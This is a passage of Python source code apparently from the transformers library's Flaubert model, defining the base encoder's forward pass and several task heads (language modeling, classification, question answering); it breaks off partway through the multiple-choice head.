        self.dim = config.emb_dim  # 512 by default
        self.hidden_dim = self.dim * 4  # 2048 by default
        self.n_heads = config.n_heads  # 8 by default
        self.n_layers = config.n_layers
        self.dropout = config.dropout
        self.attention_dropout = config.attention_dropout
        assert self.dim % self.n_heads == 0, "transformer dim must be a multiple of n_heads"

        # embeddings
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, self.dim)
        if config.sinusoidal_embeddings:
            create_sinusoidal_embeddings(config.max_position_embeddings, self.dim, out=self.position_embeddings.weight)
        if config.n_langs > 1 and config.use_lang_emb:
            self.lang_embeddings = nn.Embedding(self.n_langs, self.dim)
        self.embeddings = nn.Embedding(self.n_words, self.dim, padding_idx=self.pad_index)
        self.layer_norm_emb = nn.LayerNorm(self.dim, eps=config.layer_norm_eps)

        # transformer layers
        self.attentions = nn.ModuleList()
        self.layer_norm1 = nn.ModuleList()
        self.ffns = nn.ModuleList()
        self.layer_norm2 = nn.ModuleList()
        # if self.is_decoder:
        #     self.layer_norm15 = nn.ModuleList()
        #     self.encoder_attn = nn.ModuleList()
        for _ in range(self.n_layers):
            self.attentions.append(MultiHeadAttention(self.n_heads, self.dim, config=config))
            self.layer_norm1.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
            # if self.is_decoder:
            #     self.layer_norm15.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))
            #     self.encoder_attn.append(MultiHeadAttention(self.n_heads, self.dim, dropout=self.attention_dropout))
            self.ffns.append(TransformerFFN(self.dim, self.hidden_dim, self.dim, config=config))
            self.layer_norm2.append(nn.LayerNorm(self.dim, eps=config.layer_norm_eps))

        # Re-apply any head pruning recorded on the config (e.g. from a checkpoint).
        if hasattr(config, "pruned_heads"):
            pruned_heads = config.pruned_heads.copy().items()
            config.pruned_heads = {}
            for layer, heads in pruned_heads:
                if self.attentions[int(layer)].n_heads == config.n_heads:
                    self.prune_heads({int(layer): list(map(int, heads))})

        # Initialize weights and apply final processing
        self.post_init()

        self.layerdrop = getattr(config, "layerdrop", 0.0)
        self.pre_norm = getattr(config, "pre_norm", False)
        # Registered once, non-persistent: the buffer is rebuilt from the config, so
        # it is kept out of the state_dict (and out of missing-key warnings via
        # `_keys_to_ignore_on_load_missing`).
        self.register_buffer(
            "position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)), persistent=False
        )

    # Copied from transformers.models.xlm.modeling_xlm.XLMModel.get_input_embeddings
    def get_input_embeddings(self):
        return self.embeddings

    # Copied from transformers.models.xlm.modeling_xlm.XLMModel.set_input_embeddings
    def set_input_embeddings(self, new_embeddings):
        self.embeddings = new_embeddings

    # Copied from transformers.models.xlm.modeling_xlm.XLMModel._prune_heads
    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.attentions[layer].prune_heads(heads)

    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING)
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=BaseModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        lengths: Optional[torch.LongTensor] = None,
        cache: Optional[Dict[str, torch.FloatTensor]] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, BaseModelOutput]:
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        # removed: src_enc=None, src_len=None
        if input_ids is not None:
            bs, slen = input_ids.size()
        else:
            bs, slen = inputs_embeds.size()[:-1]

        device = input_ids.device if input_ids is not None else inputs_embeds.device

        # Derive per-sentence lengths from padding when the caller did not pass them.
        if lengths is None:
            if input_ids is not None:
                lengths = (input_ids != self.pad_index).sum(dim=1).long()
            else:
                lengths = torch.tensor([slen] * bs, device=device)
        # mask = input_ids != self.pad_index

        # check inputs
        assert lengths.size(0) == bs
        assert lengths.max().item() <= slen
        # input_ids = input_ids.transpose(0, 1)  # batch size as dimension 0
        # assert (src_enc is None) == (src_len is None)
        # if src_enc is not None:
        #     assert self.is_decoder
        #     assert src_enc.size(0) == bs

        # generate masks
        mask, attn_mask = get_masks(slen, lengths, self.causal, padding_mask=attention_mask)
        # if self.is_decoder and src_enc is not None:
        #     src_mask = torch.arange(src_len.max(), dtype=torch.long, device=lengths.device) < src_len[:, None]

        # Setting the position-ids to the registered buffer in constructor, it helps
        # when tracing the model without passing position-ids, solves
        # isues similar to issue #5664
        if position_ids is None:
            if hasattr(self, "position_ids"):
                position_ids = self.position_ids[:, :slen]
                position_ids = position_ids.expand((bs, slen))
            else:
                position_ids = torch.arange(slen, dtype=torch.long, device=device)
                position_ids = position_ids.unsqueeze(0).expand((bs, slen))
        else:
            assert position_ids.size() == (bs, slen)  # (slen, bs)
            # position_ids = position_ids.transpose(0, 1)

        # langs
        if langs is not None:
            assert langs.size() == (bs, slen)  # (slen, bs)
            # langs = langs.transpose(0, 1)

        # Prepare head mask if needed
        head_mask = self.get_head_mask(head_mask, self.config.n_layers)

        # do not recompute cached elements: keep only the not-yet-processed suffix
        if cache is not None and input_ids is not None:
            _slen = slen - cache["slen"]
            input_ids = input_ids[:, -_slen:]
            position_ids = position_ids[:, -_slen:]
            if langs is not None:
                langs = langs[:, -_slen:]
            mask = mask[:, -_slen:]
            attn_mask = attn_mask[:, -_slen:]

        # embeddings
        if inputs_embeds is None:
            inputs_embeds = self.embeddings(input_ids)

        tensor = inputs_embeds + self.position_embeddings(position_ids).expand_as(inputs_embeds)
        if langs is not None and self.use_lang_emb and self.config.n_langs > 1:
            tensor = tensor + self.lang_embeddings(langs)
        if token_type_ids is not None:
            tensor = tensor + self.embeddings(token_type_ids)
        tensor = self.layer_norm_emb(tensor)
        tensor = nn.functional.dropout(tensor, p=self.dropout, training=self.training)
        # Zero out padded positions so they contribute nothing downstream.
        tensor *= mask.unsqueeze(-1).to(tensor.dtype)

        # transformer layers
        hidden_states = () if output_hidden_states else None
        attentions = () if output_attentions else None
        for i in range(self.n_layers):
            # LayerDrop: randomly skip whole layers during training.
            dropout_probability = random.uniform(0, 1)
            if self.training and (dropout_probability < self.layerdrop):
                continue

            if output_hidden_states:
                hidden_states = hidden_states + (tensor,)

            # self attention (post-norm or pre-norm variant, per config)
            if not self.pre_norm:
                attn_outputs = self.attentions[i](
                    tensor,
                    attn_mask,
                    cache=cache,
                    head_mask=head_mask[i],
                    output_attentions=output_attentions,
                )
                attn = attn_outputs[0]
                if output_attentions:
                    attentions = attentions + (attn_outputs[1],)
                attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
                tensor = tensor + attn
                tensor = self.layer_norm1[i](tensor)
            else:
                tensor_normalized = self.layer_norm1[i](tensor)
                attn_outputs = self.attentions[i](tensor_normalized, attn_mask, cache=cache, head_mask=head_mask[i])
                attn = attn_outputs[0]
                if output_attentions:
                    attentions = attentions + (attn_outputs[1],)
                attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
                tensor = tensor + attn

            # encoder attention (for decoder only)
            # if self.is_decoder and src_enc is not None:
            #     attn = self.encoder_attn[i](tensor, src_mask, kv=src_enc, cache=cache)
            #     attn = nn.functional.dropout(attn, p=self.dropout, training=self.training)
            #     tensor = tensor + attn
            #     tensor = self.layer_norm15[i](tensor)

            # FFN
            if not self.pre_norm:
                tensor = tensor + self.ffns[i](tensor)
                tensor = self.layer_norm2[i](tensor)
            else:
                tensor_normalized = self.layer_norm2[i](tensor)
                tensor = tensor + self.ffns[i](tensor_normalized)

            tensor *= mask.unsqueeze(-1).to(tensor.dtype)

        # Add last hidden state
        if output_hidden_states:
            hidden_states = hidden_states + (tensor,)

        # update cache length
        if cache is not None:
            cache["slen"] += tensor.size(1)

        # move back sequence length to dimension 0
        # tensor = tensor.transpose(0, 1)

        if not return_dict:
            return tuple(v for v in [tensor, hidden_states, attentions] if v is not None)

        return BaseModelOutput(last_hidden_state=tensor, hidden_states=hidden_states, attentions=attentions)
@add_start_docstrings(
    """
    The Flaubert Model transformer with a language modeling head on top (linear layer with weights tied to the input
    embeddings).
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied transformers.models.xlm.modeling_xlm.XLMWithLMHeadModel with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertWithLMHeadModel(FlaubertPreTrainedModel):
    """Flaubert encoder + `FlaubertPredLayer` vocabulary head (weights tied to the input embeddings)."""

    _keys_to_ignore_on_load_missing = ["pred_layer.proj.weight"]

    def __init__(self, config):
        super().__init__(config)
        self.transformer = FlaubertModel(config)
        self.pred_layer = FlaubertPredLayer(config)

        # Initialize weights and apply final processing
        self.post_init()

    def get_output_embeddings(self):
        return self.pred_layer.proj

    def set_output_embeddings(self, new_embeddings):
        self.pred_layer.proj = new_embeddings

    def prepare_inputs_for_generation(self, input_ids, **kwargs):
        """Append one mask-token column (and matching language ids, if configured) for generation."""
        batch_size = input_ids.shape[0]
        mask_column = torch.full(
            (batch_size, 1), self.config.mask_token_id, dtype=torch.long, device=input_ids.device
        )
        extended_ids = torch.cat([input_ids, mask_column], dim=1)
        lang_id = self.config.lang_id
        langs = torch.full_like(extended_ids, lang_id) if lang_id is not None else None
        return {"input_ids": extended_ids, "langs": langs}

    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=MaskedLMOutput,
        config_class=_CONFIG_FOR_DOC,
        mask="<special1>",
    )
    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        lengths: Optional[torch.Tensor] = None,
        cache: Optional[Dict[str, torch.Tensor]] = None,
        head_mask: Optional[torch.Tensor] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        labels: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, MaskedLMOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
            `labels = input_ids` Indices are selected in `[-100, 0, ..., config.vocab_size]` All labels set to `-100`
            are ignored (masked), the loss is only computed for labels in `[0, ..., config.vocab_size]`
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        encoder_outputs = self.transformer(
            input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        # (loss, logits) when labels are given, (logits,) otherwise.
        pred_outputs = self.pred_layer(encoder_outputs[0], labels)

        if not return_dict:
            return pred_outputs + encoder_outputs[1:]

        has_labels = labels is not None
        return MaskedLMOutput(
            loss=pred_outputs[0] if has_labels else None,
            logits=pred_outputs[1] if has_labels else pred_outputs[0],
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
        )
@add_start_docstrings(
    """
    Flaubert Model with a sequence classification/regression head on top (a linear layer on top of the pooled output)
    e.g. for GLUE tasks.
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied transformers.models.xlm.modeling_xlm.XLMForSequenceClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForSequenceClassification(FlaubertPreTrainedModel):
    """Flaubert encoder + `SequenceSummary` pooling + classification/regression head."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.config = config
        self.transformer = FlaubertModel(config)
        self.sequence_summary = SequenceSummary(config)

        # Initialize weights and apply final processing
        self.post_init()

    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=SequenceClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        lengths: Optional[torch.Tensor] = None,
        cache: Optional[Dict[str, torch.Tensor]] = None,
        head_mask: Optional[torch.Tensor] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        labels: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, SequenceClassifierOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
            config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
            `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        transformer_outputs = self.transformer(
            input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        logits = self.sequence_summary(transformer_outputs[0])

        loss = None
        if labels is not None:
            problem_type = self.config.problem_type
            if problem_type is None:
                # Infer the problem type once and cache it on the config.
                if self.num_labels == 1:
                    problem_type = "regression"
                elif self.num_labels > 1 and labels.dtype in (torch.long, torch.int):
                    problem_type = "single_label_classification"
                else:
                    problem_type = "multi_label_classification"
                self.config.problem_type = problem_type

            if problem_type == "regression":
                loss_fct = MSELoss()
                if self.num_labels == 1:
                    loss = loss_fct(logits.squeeze(), labels.squeeze())
                else:
                    loss = loss_fct(logits, labels)
            elif problem_type == "single_label_classification":
                loss = CrossEntropyLoss()(logits.view(-1, self.num_labels), labels.view(-1))
            elif problem_type == "multi_label_classification":
                loss = BCEWithLogitsLoss()(logits, labels)

        if not return_dict:
            output = (logits,) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return SequenceClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
@add_start_docstrings(
    """
    Flaubert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
    Named-Entity-Recognition (NER) tasks.
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_xlm.XLMForTokenClassification with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForTokenClassification(FlaubertPreTrainedModel):
    """Flaubert encoder + dropout + per-token linear classifier."""

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.transformer = FlaubertModel(config)
        self.dropout = nn.Dropout(config.dropout)
        self.classifier = nn.Linear(config.hidden_size, config.num_labels)

        # Initialize weights and apply final processing
        self.post_init()

    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=TokenClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        lengths: Optional[torch.Tensor] = None,
        cache: Optional[Dict[str, torch.Tensor]] = None,
        head_mask: Optional[torch.Tensor] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        labels: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, TokenClassifierOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        transformer_outputs = self.transformer(
            input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        logits = self.classifier(self.dropout(transformer_outputs[0]))

        loss = None
        if labels is not None:
            loss = CrossEntropyLoss()(logits.view(-1, self.num_labels), labels.view(-1))

        if not return_dict:
            output = (logits,) + transformer_outputs[1:]
            return ((loss,) + output) if loss is not None else output

        return TokenClassifierOutput(
            loss=loss,
            logits=logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
@add_start_docstrings(
    """
    Flaubert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
    layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformers.models.xlm.modeling_xlm.XLMForQuestionAnsweringSimple with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForQuestionAnsweringSimple(FlaubertPreTrainedModel):
    """Flaubert encoder + a single linear layer producing span start/end logits."""

    def __init__(self, config):
        super().__init__(config)
        self.transformer = FlaubertModel(config)
        self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)

        # Initialize weights and apply final processing
        self.post_init()

    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=QuestionAnsweringModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        lengths: Optional[torch.Tensor] = None,
        cache: Optional[Dict[str, torch.Tensor]] = None,
        head_mask: Optional[torch.Tensor] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        start_positions: Optional[torch.Tensor] = None,
        end_positions: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, QuestionAnsweringModelOutput]:
        r"""
        start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        transformer_outputs = self.transformer(
            input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )

        span_logits = self.qa_outputs(transformer_outputs[0])
        start_logits, end_logits = (t.squeeze(-1).contiguous() for t in span_logits.split(1, dim=-1))

        total_loss = None
        if start_positions is not None and end_positions is not None:
            # If we are on multi-GPU, split add a dimension
            if start_positions.dim() > 1:
                start_positions = start_positions.squeeze(-1)
            if end_positions.dim() > 1:
                end_positions = end_positions.squeeze(-1)
            # sometimes the start/end positions are outside our model inputs, we ignore these terms
            ignored_index = start_logits.size(1)
            start_positions = start_positions.clamp(0, ignored_index)
            end_positions = end_positions.clamp(0, ignored_index)

            loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
            total_loss = 0.5 * (loss_fct(start_logits, start_positions) + loss_fct(end_logits, end_positions))

        if not return_dict:
            output = (start_logits, end_logits) + transformer_outputs[1:]
            return ((total_loss,) + output) if total_loss is not None else output

        return QuestionAnsweringModelOutput(
            loss=total_loss,
            start_logits=start_logits,
            end_logits=end_logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
@add_start_docstrings(
    """
    Flaubert Model with a beam-search span classification head on top for extractive question-answering tasks like
    SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
    """,
    FLAUBERT_START_DOCSTRING,
)
# NOTE(review): the `add_start_docstrings` decorator above describes the
# `FlaubertForQuestionAnswering` *model* defined below, yet here it is stacked on
# this output dataclass — presumably displaced when the file was assembled;
# confirm against upstream `modeling_flaubert.py`.
@dataclass
# Copied from transformer.models.xlm.modeling_xlm.XLMForQuestionAnsweringOutput with XLM->Flaubert
class FlaubertForQuestionAnsweringOutput(ModelOutput):
    """
    Base class for outputs of question answering models using a `SquadHead`.
    Args:
        loss (`torch.FloatTensor` of shape `(1,)`, *optional*, returned if both `start_positions` and `end_positions` are provided):
            Classification loss as the sum of start token, end token (and is_impossible if provided) classification
            losses.
        start_top_log_probs (`torch.FloatTensor` of shape `(batch_size, config.start_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
            Log probabilities for the top config.start_n_top start token possibilities (beam-search).
        start_top_index (`torch.LongTensor` of shape `(batch_size, config.start_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
            Indices for the top config.start_n_top start token possibilities (beam-search).
        end_top_log_probs (`torch.FloatTensor` of shape `(batch_size, config.start_n_top * config.end_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
            Log probabilities for the top `config.start_n_top * config.end_n_top` end token possibilities
            (beam-search).
        end_top_index (`torch.LongTensor` of shape `(batch_size, config.start_n_top * config.end_n_top)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
            Indices for the top `config.start_n_top * config.end_n_top` end token possibilities (beam-search).
        cls_logits (`torch.FloatTensor` of shape `(batch_size,)`, *optional*, returned if `start_positions` or `end_positions` is not provided):
            Log probabilities for the `is_impossible` label of the answers.
        hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    """

    # Field order is part of the tuple interface of ModelOutput — do not reorder.
    loss: Optional[torch.FloatTensor] = None
    start_top_log_probs: Optional[torch.FloatTensor] = None
    start_top_index: Optional[torch.LongTensor] = None
    end_top_log_probs: Optional[torch.FloatTensor] = None
    end_top_index: Optional[torch.LongTensor] = None
    cls_logits: Optional[torch.FloatTensor] = None
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None
    attentions: Optional[Tuple[torch.FloatTensor]] = None
# Copied from transformer.models.xlm.modeling_xlm.XLMForQuestionAnswering with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForQuestionAnswering(FlaubertPreTrainedModel):
    """Flaubert encoder with a beam-search span-classification head (`SQuADHead`) on top,
    for extractive question answering (SQuAD-style) with answerability prediction."""
    def __init__(self, config):
        super().__init__(config)
        self.transformer = FlaubertModel(config)
        # Beam-search QA head: emits top-k start/end log-probs and a `cls_logits`
        # answerability score instead of plain start/end logits.
        self.qa_outputs = SQuADHead(config)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(FLAUBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @replace_return_docstrings(output_type=FlaubertForQuestionAnsweringOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        langs: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
        lengths: Optional[torch.Tensor] = None,
        cache: Optional[Dict[str, torch.Tensor]] = None,
        head_mask: Optional[torch.Tensor] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        start_positions: Optional[torch.Tensor] = None,
        end_positions: Optional[torch.Tensor] = None,
        is_impossible: Optional[torch.Tensor] = None,
        cls_index: Optional[torch.Tensor] = None,
        p_mask: Optional[torch.Tensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, FlaubertForQuestionAnsweringOutput]:
        r"""
        start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the start of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the end of the labelled span for computing the token classification loss.
            Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
            are not taken into account for computing the loss.
        is_impossible (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels whether a question has an answer or no answer (SQuAD 2.0)
        cls_index (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for position (index) of the classification token to use as input for computing plausibility of the
            answer.
        p_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Optional mask of tokens which can't be in answers (e.g. [CLS], [PAD], ...). 1.0 means token should be
            masked. 0.0 mean token is not masked.
        Returns:
        Example:
        ```python
        >>> from transformers import FlaubertTokenizer, FlaubertForQuestionAnswering
        >>> import torch
        >>> tokenizer = FlaubertTokenizer.from_pretrained("flaubert/flaubert_base_cased")
        >>> model = FlaubertForQuestionAnswering.from_pretrained("flaubert/flaubert_base_cased")
        >>> input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(
        ...     0
        ... )  # Batch size 1
        >>> start_positions = torch.tensor([1])
        >>> end_positions = torch.tensor([3])
        >>> outputs = model(input_ids, start_positions=start_positions, end_positions=end_positions)
        >>> loss = outputs.loss
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        transformer_outputs = self.transformer(
            input_ids,
            attention_mask=attention_mask,
            langs=langs,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            lengths=lengths,
            cache=cache,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # Last-layer hidden states: (batch_size, sequence_length, hidden_size).
        output = transformer_outputs[0]
        # The head computes the loss itself when labels are provided; otherwise it
        # returns the beam-search start/end candidates and the cls logits.
        outputs = self.qa_outputs(
            output,
            start_positions=start_positions,
            end_positions=end_positions,
            cls_index=cls_index,
            is_impossible=is_impossible,
            p_mask=p_mask,
            return_dict=return_dict,
        )
        if not return_dict:
            # Tuple mode: head outputs first, then the encoder's extra outputs
            # (hidden states / attentions, when requested).
            return outputs + transformer_outputs[1:]
        return FlaubertForQuestionAnsweringOutput(
            loss=outputs.loss,
            start_top_log_probs=outputs.start_top_log_probs,
            start_top_index=outputs.start_top_index,
            end_top_log_probs=outputs.end_top_log_probs,
            end_top_index=outputs.end_top_index,
            cls_logits=outputs.cls_logits,
            hidden_states=transformer_outputs.hidden_states,
            attentions=transformer_outputs.attentions,
        )
@add_start_docstrings(
    """
    Flaubert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
    softmax) e.g. for RocStories/SWAG tasks.
    """,
    FLAUBERT_START_DOCSTRING,
)
# Copied from transformer.models.xlm.modeling_xlm.XLMForMultipleChoice with XLM_INPUTS->FLAUBERT_INPUTS,XLM->Flaubert
class FlaubertForMultipleChoice(FlaubertPreTrainedModel):
    def __init__(self, config, *inputs, **kwargs):
        super().__init__(config, *inputs, **kwargs)
        self.transformer = FlaubertModel(config)
        # Pools each (flattened) choice's token sequence into a single vector.
        self.sequence_summary = SequenceSummary(config)
        # NOTE(review): the summary output is assumed to have `config.num_labels`
        # features (via `summary_proj_to_labels`), which this maps to one score
        # per choice — confirm `summary_proj_to_labels=True` for this config.
        self.logits_proj = nn.Linear(config.num_labels, 1)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(
        FLAUBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
    )
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=MultipleChoiceModelOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
